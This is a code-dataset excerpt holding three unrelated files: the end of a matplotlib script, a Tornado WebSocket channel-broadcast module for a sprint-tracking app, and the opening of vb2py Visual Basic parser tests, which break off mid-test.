plt.subplot(1, 2, 2)
plt.plot(V_max_fit, '*-', label='Vmax_fit')
plt.hold(True)
plt.plot(V0_fit, '*-', label='V0_fit')
plt.legend()
plt.show()
|
h-mayorquin/g_node_data_analysis_205
|
1_day/fit_data.py
|
Python
|
bsd-2-clause
| 1,957
| 0.001533
|
try:
from tornado.websocket import WebSocketHandler
import tornado.ioloop
tornadoAvailable = True
except ImportError:
class WebSocketHandler(object): pass
tornadoAvailable = False
from json import loads as fromJS, dumps as toJS
from threading import Thread
from Log import console
import Settings
from utils import *
PORT = Settings.PORT + 1
handlers = []
channels = {}
class WebSocket:
@staticmethod
def available():
return tornadoAvailable
@staticmethod
def start():
if WebSocket.available():
WSThread().start()
@staticmethod
def broadcast(data):
for handler in handlers:
handler.write_message(toJS(data))
@staticmethod
def sendChannel(channel, data):
if not 'channel' in data:
data['channel'] = channel
for handler in channels.get(channel, []):
handler.write_message(toJS(data))
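# Client messages handled by WSHandler.on_message are JSON objects that may
# contain "subscribe" and/or "unsubscribe" lists of channel names, e.g.
# {"subscribe": ["backlog#3"], "unsubscribe": ["backlog#1"]}.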
class WSThread(Thread):
def __init__(self):
Thread.__init__(self)
self.name = 'websocket'
self.daemon = True
def run(self):
app = tornado.web.Application([('/', WSHandler)])
app.listen(PORT, '0.0.0.0')
tornado.ioloop.IOLoop.instance().start()
class WSHandler(WebSocketHandler):
def __init__(self, *args, **kw):
super(WSHandler, self).__init__(*args, **kw)
self.channels = set()
def check_origin(self, origin):
return True
def open(self):
handlers.append(self)
console('websocket', "Opened")
def on_message(self, message):
console('websocket', "Message received: %s" % message)
try:
data = fromJS(message)
except:
return
if 'subscribe' in data and isinstance(data['subscribe'], list):
addChannels = (set(data['subscribe']) - self.channels)
self.channels |= addChannels
for channel in addChannels:
if channel not in channels:
channels[channel] = set()
channels[channel].add(self)
if 'unsubscribe' in data and isinstance(data['unsubscribe'], list):
rmChannels = (self.channels & set(data['unsubscribe']))
self.channels -= rmChannels
for channel in rmChannels:
channels[channel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
def on_close(self):
for channel in self.channels:
channels[channel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
handlers.remove(self)
console('websocket', "Closed")
verbs = {
'status': "Status set",
'name': "Renamed",
'goal': "Goal set",
'assigned': "Reassigned",
'hours': "Hours updated",
}
from Event import EventHandler, addEventHandler
class ShareTaskChanges(EventHandler):
def newTask(self, handler, task):
WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'new'}); #TODO
def taskUpdate(self, handler, task, field, value):
if field == 'assigned': # Convert set of Users to list of usernames
value = [user.username for user in value]
elif field == 'goal': # Convert Goal to goal ID
value = value.id if value else 0
description = ("%s by %s" % (verbs[field], task.creator)) if field in verbs else None
WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'update', 'id': task.id, 'revision': task.revision, 'field': field, 'value': value, 'description': description, 'creator': task.creator.username})
addEventHandler(ShareTaskChanges())
|
mrozekma/Sprint
|
WebSocket.py
|
Python
|
mit
| 3,192
| 0.030075
|
#
# Turn off logging in extensions (too loud!)
import vb2py.extensions
vb2py.extensions.disableLogging()
from vb2py.vbparser import buildParseTree, VBParserError
# TestCase and main are used below; assuming the standard unittest module supplies them
from unittest import TestCase, main
#
# Set some config options which are appropriate for testing
import vb2py.config
Config = vb2py.config.VB2PYConfig()
Config.setLocalOveride("General", "ReportPartialConversion", "No")
tests = []
# << Parsing tests >> (1 of 61)
# Simple assignments
tests.append("""
a = 10
b = 20+30
c = "hello there"
oneVal = 10
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# Set type assignments
tests.append("""
Set a = myobject
Set b = myobject.subobject
Set obj = function(10, 20, 30+40)
""")
# Set type assignments with "New" objects
tests.append("""
Set a = New myobject
Set b = New myobject.subobject
""")
# Assignments with tough parenthesis
tests.extend([
"d=(((4*5)/2+10)-10)",
])
# Assignments with tough string quotes
tests.extend([
'd="g""h""j"""',
])
# Assignments with tough strings in general
tests.extend([
r'a="\"', # The single slash is a killer
])
# << Parsing tests >> (2 of 61)
# Simple expressions
tests.extend([
'a = 10',
'a = 20+30',
'a = "hello there"',
'a = 10',
'a = Array(10,20)',
'a = myfunction.mymethod(10)',
'a = &HFF',
'a = &HFF&',
'a = #1/10/2000#',
'a = #1/10#',
'a = 10 Mod 2',
])
# Nested expressions
tests.extend(["a = 10+(10+(20+(30+40)))",
"a = (10+20)+(30+40)",
"a = ((10+20)+(30+40))",
])
# Conditional expressions
tests.extend(["a = a = 1",
"a = a <> 10",
"a = a > 10",
"a = a < 10",
"a = a <= 10",
"a = a >= 10",
"a = a = 1 And b = 2",
"a = a = 1 Or b = 2",
"a = a Or b",
"a = a Or Not b",
"a = Not a = 1",
"a = Not a",
"a = a Xor b",
"a = b Is Nothing",
"a = b \ 2",
"a = b Like c",
'a = "hello" Like "goodbye"',
])
# Things that failed
tests.extend([
"a = -(x*x)",
"a = -x*10",
"a = 10 Mod 6",
"Set NewEnum = mCol.[_NewEnum]",
"a = 10 ^ -bob",
])
# Functions
tests.extend([
"a = myfunction",
"a = myfunction()",
"a = myfunction(1,2,3,4)",
"a = myfunction(1,2,3,z:=4)",
"a = myfunction(x:=1,y:=2,z:=4)",
"a = myfunction(b(10))",
"a = myfunction(b _\n(10))",
])
# String Functions
tests.extend([
'a = Trim$("hello")',
'a = Left$("hello", 4)',
])
# Things that failed
tests.extend([
"a = -(x*x)",
"a = -x*10",
"a = 10 Mod 6",
])
# Address of
tests.extend([
"a = fn(AddressOf fn)",
"a = fn(a, b, c, AddressOf fn)",
"a = fn(a, AddressOf b, AddressOf c, AddressOf fn)",
"a = fn(a, AddressOf b.m.m, AddressOf c.k.l, AddressOf fn)",
])
# Type of
tests.extend([
"a = fn(TypeOf fn)",
"a = fn(a, b, c, TypeOf fn)",
"a = fn(a, TypeOf b, TypeOf c, TypeOf fn)",
"a = fn(a, TypeOf b.m.m, TypeOf c.k.l, TypeOf fn)",
"a = TypeOf Control Is This",
"a = TypeOf Control Is This Or TypeOf Control Is That",])
# << Parsing tests >> (3 of 61)
# Using ByVal and ByRef in a call or expression
tests.extend([
'a = fn(ByVal b)',
'a = fn(x, y, z, ByVal b)',
'a = fn(x, y, z, ByVal b, 10, 20, 30)',
'a = fn(ByVal a, ByVal b, ByVal c)',
'a = fn(ByRef b)',
'a = fn(x, y, z, ByRef b)',
'a = fn(x, y, z, ByRef b, 10, 20, 30)',
'a = fn(ByRef a, ByRef b, ByRef c)',
'fn ByVal b',
'fn x, y, z, ByVal b',
'fn x, y, z, ByVal b, 10, 20, 30',
'fn ByVal a, ByVal b, ByVal c',
'fn ByRef b',
'fn x, y, z, ByRef b',
'fn x, y, z, ByRef b, 10, 20, 30',
'fn ByRef a, ByRef b, ByRef c',
])
# << Parsing tests >> (4 of 61)
# One line comments
tests.append("""
a = 10
' b = 20+30
' c = "hello there"
' oneVal = 10
twoVals = Array(10,20)
' functioncall = myfunction.mymethod(10)
""")
# One line comments with Rem
tests.append("""
a = 10
Rem b = 20+30
Rem not needed c = "hello there"
Rem opps oneVal = 10
twoVals = Array(10,20)
Rem dont do this anymore functioncall = myfunction.mymethod(10)
""")
# In-line comments
tests.append("""
a = 10
b = 20+30 ' comment
c = "hello there" ' another comment
oneVal = 10 ' yet another comment
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# In-line comments with Rem
tests.append("""
a = 10
b = 20+30 Rem comment
c = "hello there" Rem another comment
oneVal = 10 Rem yet another comment
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# Things which aren't comments
tests.append("""
a = "hello, this might ' look like ' a comment ' "
b = "wow there are a lot of '''''''' these here"
""")
# tough inline comments
tests.extend([
"Public a As Integer ' and a comment"
])
# comments in awkward places
tests.extend([
"""
If a =0 Then ' nasty comment
b=1
End If ' other nasty comment
""",
"""
While a<0 ' nasty comment
b=1
Wend ' other nasty comment
""",
"""
Select Case a ' nasty comment
Case 10 ' oops
b=1
Case Else ' other nasty comment
b = 2
End Select ' gotcha
""",
"""
For i = 0 To 100 ' nasty comment
b=1
Next i ' other nasty comment
""",
"""
Sub a() ' nasty comment
b=1
End Sub ' other nasty comment
""",
"""
Function f() ' nasty comment
b=1
End Function ' other nasty comment
""",
])
# << Parsing tests >> (5 of 61)
# Directives
tests.extend([
"' VB2PY-Set General.Blah = Yes",
"' VB2PY-Set General.Blah = ___",
"' VB2PY-Unset General.Blah",
"' VB2PY-Add: General.Option = 10",
])
# << Parsing tests >> (6 of 61)
# Two line continuations
tests.append("""
a = _
10 + 20 + 30
b = 10/ _
25
c = (one + _
two + three)
""")
# Milti-line continuations
tests.append("""
a = _
10 + 20 + 30 _
* 10/ _
25
c = (one + _
two + three) * _
four.five()
""")
tests.extend(["""
Private Declare Function GetTempPathA Lib "kernel32" _
(ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
""",
"""
Function GetTempPathA _
(ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
End Function
""",
])
# << Parsing tests >> (7 of 61)
# Simple dims
tests.extend([
"Dim A",
"Dim B As String",
"Dim variable As Object.OtherObj",
"Dim Var As Variant",
"Dim A As String * 100",
])
# Dims with New
tests.extend([
"Dim A As New Object",
"Dim B As New Collection",
])
# Multiple dims on one line
tests.extend([
"Dim A, B, C, D, E, F",
"Dim B As String, B As Long, B As Integer, B As String, B As String",
"Dim variable As Object.OtherObj, B, C, D, E",
"Dim Var As Variant",
"Dim A, B, C As New Collection",
"Dim E As New Collection, F As New Object, F, G",
"Dim H As New Object, G As New Object",
])
# Array type dims
tests.extend([
"Dim A()",
"Dim B(10, 20, 30) As String",
"Dim variable() As Object.OtherObj",
"Dim Var(mysize) As Variant",
])
# Scoped dims
tests.extend([
"Public A",
"Private B As String",
"Private A, B, C, D, E, F",
"Private B As String, B As Long, B As Integer, B As String, B As String",
"Private variable As Object.OtherObj, B, C, D, E",
"Public Var As Variant",
])
# Static dims
tests.extend([
"Static A",
"Static B As String",
"Static A, B, C, D, E, F",
"Static B As String, B As Long, B As Integer, B As String, B As String",
"Static variable As Object.OtherObj, B, C, D, E",
"Static Var As Variant",
])
# << Parsing tests >> (8 of 61)
# Arrays
tests.extend([
"Dim a(10)",
"Dim a(0)",
"Dim a(0), b(20), c(30)",
"Dim a(10+20)",
"Dim a(10+20, 1+3)",
"Dim a(1 To 10)",
"Dim a(1 To 10, 5 To 20)",
])
# Redims
tests.extend([
"ReDim a(10)",
"ReDim a(0)",
"ReDim Preserve a(20)",
"ReDim a(0), b(20), c(30)",
"ReDim Preserve a(20), b(20)",
"ReDim a(10+20)",
"ReDim a(10+20, 1+3)",
"ReDim a(1 To 10)",
"ReDim a(1 To 10, 5 To 20)",
"ReDim a(10).b(10)",
])
# Complex examples
tests.extend([
"""
With Obj
ReDim .Child(10)
End With
""",
])
# << Parsing tests >> (9 of 61)
# Constants with different types
tests.extend([
"Const a = 10",
'Const a = "Hello"',
"Const a = &HA1",
"Const a = 1#",
"Const a = 1%",
"Const a = 1&",
"Public Const a = 10",
'Public Const a = "Hello"',
"Public Const a = &HA1",
"Public Const a = 1#",
"Public Const a = 1%",
"Public Const a = 1&",
"Private Const a = 10",
'Private Const a = "Hello"',
"Private Const a = &HA1",
"Private Const a = 1#",
"Private Const a = 1%",
"Private Const a = 1&",
])
# Constants
tests.extend([
"Const A = 20",
'Const B = "one"',
"Private Const A = 1234.5 + 20",
"Const a=10, b=20, c=30",
"Private Const a=10, b=20, d=12345",
])
# Typed Constants
tests.extend([
"Const A As Long = 20",
'Const B As String = "one"',
"Private Const A As Single = 1234.5 + 20",
'Const a As Integer = 10, b As String = "hello", c As String * 10 = 43',
'Private Const a As Integer = 10, b As String = "hello", c As String * 10 = 43',
])
# << Parsing tests >> (10 of 61)
# Odds and ends
tests.extend([
"Private WithEvents A As Button",
])
# << Parsing tests >> (11 of 61)
# Bare calls
tests.extend([
"subr",
"object.method",
"object.method.method2.method",
])
# Explicit bare calls
tests.extend([
"Call subr",
"Call object.method",
"Call object.method.method2.method",
])
# Bare calls with arguments
tests.extend([
"subr 10, 20, 30",
"object.method a, b, c+d, e",
'object.method.method2.method 10, "hello", "goodbye" & name',
])
# Explicit calls with arguments
tests.extend([
"Call subr(10, 20, 30)",
"Call object.method(a, b, c+d, e)",
'Call object.method.method2.method(10, "hello", "goodbye" & name)',
"Call subr()",
])
# Bare calls with arguments and functions
tests.extend([
"subr 10, 20, 30",
"object(23).method a, b, c+d, e",
'object.method(5, 10, 20).method2.method 10, "hello", "goodbye" & name',
])
# Bare calls with named arguments and functions
tests.extend([
"subr 10, 20, z:=30",
"object(23).method one:=a, two:=b, three:=c+d, four:=e",
'object.method(5, 10, 20).method2.method 10, "hello", two:="goodbye" & name',
])
# Bare calls with ommitted arguments
tests.extend([
"subr 10, , 30",
"subr ,,,,0",
"subr 10, , , , 5",
])
# << Parsing tests >> (12 of 61)
# labels
tests.extend([
"label:",
"label20:",
"20:",
"label: a=1",
"20: a=1",
"101: doit",
"101:\ndoit",
"102: doit now",
"103: doit now, for, ever",
])
# Goto's
tests.extend([
"GoTo Label",
"GoTo 20",
"GoTo Label:",
"GoTo 20:",
])
# Structures with labels
tests.extend([
"""
101: If a < 10 Then
102: b=1
103: End If
""",
"""
101: While a < 0
102: b=1
103: Wend
""",
"""
101: Select Case a
102: Case 10
103: b= 1
104: Case Else
105: b=2
103: End Select
""",
"""
101: For i = 0 To 100
102: b=1
103: Next i
""",
"""
101: Sub a()
102: b=1
103: End Sub
""",
])
# Numeric labels don't even need a ':' ... aarg!
tests.extend([
"""
101 If a < 10 Then
102 b=1
103 End If
""",
"""
101 While a < 0
102 b=1
103 Wend
""",
"""
101 Select Case a
102 Case 10
103 b= 1
104 Case Else
105 b=2
103 End Select
""",
"""
101 For i = 0 To 100
102 b=1
103 Next i
""",
"""
101 Sub a()
102 b=1
103 End Sub
""",
])
# << Parsing tests >> (13 of 61)
# simple multi-line statements
tests.extend([
"a = 10: b = 20",
"a = 10: b = 20: c=1: d=1: e=2",
"a=10:",
"a=10: b=20:",
])
# Blocks on a line
tests.extend([
"For i = 0 To 10: b=b+i: Next i",
"If a > b Then a = 10: b = 20"
])
# Bug #809979 - Line ending with a colon fails
tests.extend([
"a = 10:\nb = 20",
"a = 10: b = 20:\nc=1: d=1: e=2",
"a=10:\nb=20:\nc=1",
])
# << Parsing tests >> (14 of 61)
# open statements
tests.extend([
"Open fn For Output As 12",
"Open fn For Output As #12",
"Open fn For Input As 12",
"Open fn For Input As #12",
"Open fn.gk.gl() For Input As #NxtChn()",
"Open fn For Append Lock Write As 23",
"Open fn For Random As 23 Len = 1234",
"Close 1",
"Close #1",
"Close channel",
"Close #channel",
"Close",
"Close\na=1",
"Closet = 10",
])
# Bug #810968 Close #1, #2 ' fails to parse
tests.extend([
"Close #1, #2, #3, #4",
"Close 1, 2, 3, 4",
"Close #1, 2, #3, 4",
"Close #one, #two, #three, #four",
"Close one, two, three, four",
"Close #1,#2,#3,#4",
"Close #1 , #2 , #3 , #4 ",
])
# << Parsing tests >> (15 of 61)
# print# statements
tests.extend([
"Print 10",
"Print #1, 10",
"Print 10, 20, 30;",
"Print #1, 10, 20, 30;",
"Print #1, 10; 20; 30;",
"Print #1, 10; 20; 30; 40, 50, 60, 70; 80; 90",
"Print 10, 20, 30,",
"Print 10, 20, 30",
"Print",
"Print ;;;",
"Print ,,,",
"Print 1,,,2,,,3,,,;",
"Print #3,",
"Print #3,;;;",
"Print #3,,,",
"Print #3,1,,,2,,,3,,,;",
])
# get# statements
tests.extend([
"Get #1, a, b",
"Get #1, , b",
])
# input # statements
tests.extend([
"Input #1, a, b",
"Input #1, b",
"a = Input(20, #3)",
"a = Input(20, #id)",
])
# line input # statements
tests.extend([
"Line Input #1, b",
])
# Seek
tests.extend([
"Seek #filenum, value",
"10: Seek #filenum, value",
"10: Seek #filenum, value ' comment",
"Seek #filenum, value ' comment",
])
# << Parsing tests >> (16 of 61)
tests.extend([
'Private Declare Function FileTimeToSystemTime Lib "kernel32" (ftFileTime As FILETIME, stSystemTime As SYSTEMTIME) As Long',
'Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)',
'Private Declare Function GetFileAttributes Lib "kernel32" Alias "GetFileAttributesA" (ByVal lpFileName As String) As Long',
'Private Declare Function GetFileAttributes Lib "kernel32" _ \n(ByVal lpFileName As String) As Long',
'Private Declare Function GetFileAttributes Lib "kernel32" _ \n(ByVal lpFileName As String, A) As Long',
'Private Declare Function GetFileAttributes Lib "kernel32" _ \n(ByVal lpFileName As String , A) As Long',
'Private Declare Function GetFileAttributes Lib "kernel32" _ \n(ByVal lpFileName As String ) As Long',
])
# << Parsing tests >> (17 of 61)
# General on error goto
tests.extend([
"On Error GoTo 100",
"On Error GoTo ErrTrap",
"On Error GoTo 100 ' comment",
"On Error GoTo ErrTrap ' comment",
"100: On Error GoTo 100",
"label: On Error GoTo ErrTrap",
"100: On Error GoTo 100 ' comment",
"label: On Error GoTo ErrTrap ' comment",
])
# General on error resume next
tests.extend([
"On Error Resume Next",
"On Error Resume Next ' comment",
"100: On Error Resume Next",
"label: On Error Resume Next",
"100: On Error Resume Next ' comment",
"label: On Error Resume Next ' comment",
])
# General on error goto -
tests.extend([
"On Error GoTo 0",
"On Error GoTo 0 ' comment",
"100: On Error GoTo 0",
"100: On Error GoTo 0 ' comment",
])
# On something goto list
tests.extend([
"On var GoTo 20",
"On var GoTo 10,20,30,40",
])
# Resume
tests.extend([
"label: Resume Next",
"Resume Next",
"label: Resume Next ' Comment",
"label: Resume 7",
"Resume 7",
"label: Resume 7 ' Comment",
"label: Resume",
"Resume\na=1",
"label: Resume' Comment",
])
# General on local error resume next
tests.extend([
"On Local Error Resume Next",
"On Local Error Resume Next ' comment",
"100: On Local Error Resume Next",
"label: On Local Error Resume Next",
"100: On Local Error Resume Next ' comment",
"label: On Local Error Resume Next ' comment",
])
# Bug #809979 - On Error with : after the label fails
tests.extend([
"On Error GoTo 0:\na=1",
"On Error GoTo 0: ' comment",
"100: On Error GoTo 0:\na=1",
"100: On Error GoTo 0: ' comment",
"On Error GoTo lbl:\na=1",
"On Error GoTo lbl: ' comment",
"100: On Error GoTo lbl:\na=1",
"100: On Error GoTo lbl: ' comment",
])
# << Parsing tests >> (18 of 61)
# Lines
tests.extend([
"Line (10,20)-(30,40), 10, 20",
"obj.Pset (10, 20), RGB(1,2,2)",
])
# Move
tests.extend([
"Move (Screen.Width - Width) / 2, (Screen.Height - Height) / 2",
])
# << Parsing tests >> (19 of 61)
# General name test (rename a file)
tests.extend([
"Name file As otherfile",
"Name file & extension As otherfile",
"Name file & extension As otherfile & otherextension",
'Name path & "\origname.txt" As path & "\knewname.txt"',
])
# << Parsing tests >> (20 of 61)
# Attributes at the head of a file
tests.extend([
'Attribute VB_Name = "frmMain"',
'Attribute VB_GlobalNameSpace = False',
'Attribute VB_Creatable = False',
'Attribute VB_PredeclaredId = True',
'Attribute VB_Exposed = False',
'Attribute Me.VB_Exposed = False',
'Attribute Me.VB_Exposed = False, 1, 2, 3, 4',
'Attribute Me.VB_Exposed = False, "1", "2, 3,", 4',
])
# << Parsing tests >> (21 of 61)
# Attributes at the head of a file
tests.extend([
"""
Enum thing
_one = 1
_two = 2
_three = 3
_four = 4
End Enum
""",
"""
Enum thing
_one
_two
_three
_four
End Enum
""",
])
# << Parsing tests >> (22 of 61)
# Types
tests.extend([
"""
Private Type ShellFileInfoType
hIcon As Long
iIcon As Long
dwAttributes As Long
szDisplayName As String * 260
szTypeName As String * 80
End Type
"""
])
# << Parsing tests >> (23 of 61)
# The Option statement
tests.extend([
"Option Base 0",
"Option Base 1",
"Option Explicit",
"Option String Compare",
"Option String Compare Text",
])
# << Parsing tests >> (24 of 61)
# The End statement
tests.extend([
"10: End",
"End",
"End ' wow this is it",
"10: End ' this is the end",
])
# If with an 'End' in there
tests.append("""
If a = 10 Then
End
End If
""")
# Sub with an 'End' in there
tests.append("""
Sub doit()
End
End Sub
""")
# Fn with an 'End' in there
tests.append("""
Function doit()
End
End Function
""")
# With with an 'End' in there
tests.append("""
With obj
End
End With
""")
# << Parsing tests >> (25 of 61)
# The Event statement
tests.extend([
"Event doit()",
"Public Event doit()",
"Private Event doit()",
"Public Event doit(a, b, c, e)",
"Public Event doit(a As Integer, b As Long, c(), e As Command.Button)",
])
# << Parsing tests >> (26 of 61)
# The Debug.Print statement
tests.extend([
"Debug.Print",
"Debug.Print a",
"Debug.Print a,b",
"Debug.Print a;b",
"Debug.Print a+10;b+20",
"Debug.Print a+20, b-20",
"Debug.Print a;b;",
])
# << Parsing tests >> (27 of 61)
# Recordset notation
tests.extend([
"RS!diskID = DriveID",
"RS!diskID = DriveID+10",
'RS!diskID = "DriveID"',
])
# << Parsing tests >> (28 of 61)
# Unicode
tests.extend([
'cIÅ = 10',
'a = cIÅ + 30',
'a = "cIÅ there"',
])
# Unicode sub
tests.append("""
Sub cIÅ()
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (29 of 61)
# Simple If
tests.append("""
If a = 10 Then
b = 20
End If
If c < 1 Then
d = 15
End If
""")
# Empty If
tests.append("""
If a = 10 Then
End If
""")
# Empty If with comments
tests.append("""
If a = 10 Then ' comment here
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
End If
If c < 1 Or d Then
d = 15
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
End If
""")
# If Not
tests.append("""
If Not a = 10 Then
b=2
End If
""")
# If With labels and comment
tests.append("""
10: If Not a = 10 Then 'heres a comment
20: b=2 ' antoher here
30: End If ' here too
""")
# << Parsing tests >> (30 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
Else
b = 10
End If
If c < 1 Then
d = 15
Else
d = -12
End If
""")
# Empty If/Else
tests.append("""
If a = 10 Then
Else
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
Else
b = 1234
End If
If c < 1 Or d Then
d = 15
Else
e = "hello"
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
Else
g = 12
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
Else
h = 1234
End If
""")
# << Parsing tests >> (31 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
ElseIf a < 10 Then
b = 10
End If
If c < 1 Then
d = 15
ElseIf c = 1 Then
d = -12
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
ElseIf b = -102 Then
b = 1234
End If
If c < 1 Or d Then
d = 15
ElseIf e = Myfunction Then
e = "hello"
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
g = 12
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
End If
""")
# << Parsing tests >> (32 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
ElseIf a < 10 Then
b = 10
Else
b = 1111
End If
If c < 1 Then
d = 15
ElseIf c = 1 Then
d = -12
Else
d = "wow"
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
ElseIf b = -102 Then
b = 1234
Else
b = 4321
End If
If c < 1 Or d Then
d = 15
ElseIf e = Myfunction Then
e = "hello"
Else
g = 1
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
g = 12
Else
k = 3234
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
Else
doIt
End If
""")
# << Parsing tests >> (33 of 61)
# Simple Nested If
tests.append("""
If a = 10 Then
b = 20
If c < 1 Then
d = 15
End If
End If
""")
# Complex nested If
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
Else
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
End If
End If
Else
k = 3234
End If
""")
# << Parsing tests >> (34 of 61)
# Inline ifs
tests.extend([
"If a = 10 Then b = 20",
"If a = 20 And b = 5 Then d = 123",
"If a = 12 Then d = 1 Else g = 5",
"If a = 10 Then doit",
"If a = 10 Then doit 10, 20, 30",
"If a = 10 Then doit Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont 5, 10, 15",
"If a = 10 Then Exit Function",
"If a = 10 Then Exit Function Else DoIt",
"If a = 10 Then Exit Function Else DoIt=1",
"If a = 10 Then Exit Function Else DoIt 1, 2, 3",
"If a = 10 Then DoIt Else Exit Function",
"If a = 10 Then DoIt=1 Else Exit Function",
"If a = 10 Then DoIt 1,2,34 Else Exit Function",
])
# Weird inline if followed by assignment that failed once
tests.extend([
"If a = 10 Then b a\nc=1",
])
# << Parsing tests >> (35 of 61)
# #If
tests.append("""
#If a = 10 Then
b = 20
#Else
c=2
#End If
#If c < 1 Then
d = 15
#Else
c=2
#End If
""")
# Empty #If
tests.append("""
#If a = 10 Then
#Else
c=2
#End If
""")
# Empty #If with comments
tests.append("""
#If a = 10 Then ' comment here
#Else
c=2
#End If
""")
# Simple #If with And/Or
tests.append("""
#If a = 10 And k = "test" Then
b = 20
#Else
c=2
#End If
#If c < 1 Or d Then
d = 15
#Else
c=2
#End If
""")
# Simple #If with compount And/Or expression
tests.append("""
#If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
#Else
c=2
#End If
#If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
#Else
c=2
#End If
""")
# #If Not
tests.append("""
#If Not a = 10 Then
b=2
#Else
c=2
#End If
""")
# << Parsing tests >> (36 of 61)
# simple sub
tests.append("""
Sub MySub()
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub()
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.extend(["""
Private Sub MySub()
a=10
n=20
c="hello"
End Sub""",
"""
Public Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Friend Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Private Static Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
])
# simple sub with gap in ()
tests.append("""
Sub MySub( )
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (37 of 61)
# simple sub
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (38 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x As Single, y, z As Object, a, b As MyThing.Object, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y As Variant, z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (39 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and defaults
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c="hello")
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and defaults
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c As String = "hello")
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (40 of 61)
# ByVal, ByRef args
tests.append("""
Sub MySub(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(ByVal a, y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(ByVal a As Single, y)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (41 of 61)
# 852166 Sub X<spc>(a,b,c) fails to parse
tests.append("""
Sub MySub (ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
# 880612 Continuation character inside call
tests.append("""
Sub MySub _
(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (42 of 61)
# simple fn
tests.append("""
Function MyFn()
a=10
n=20
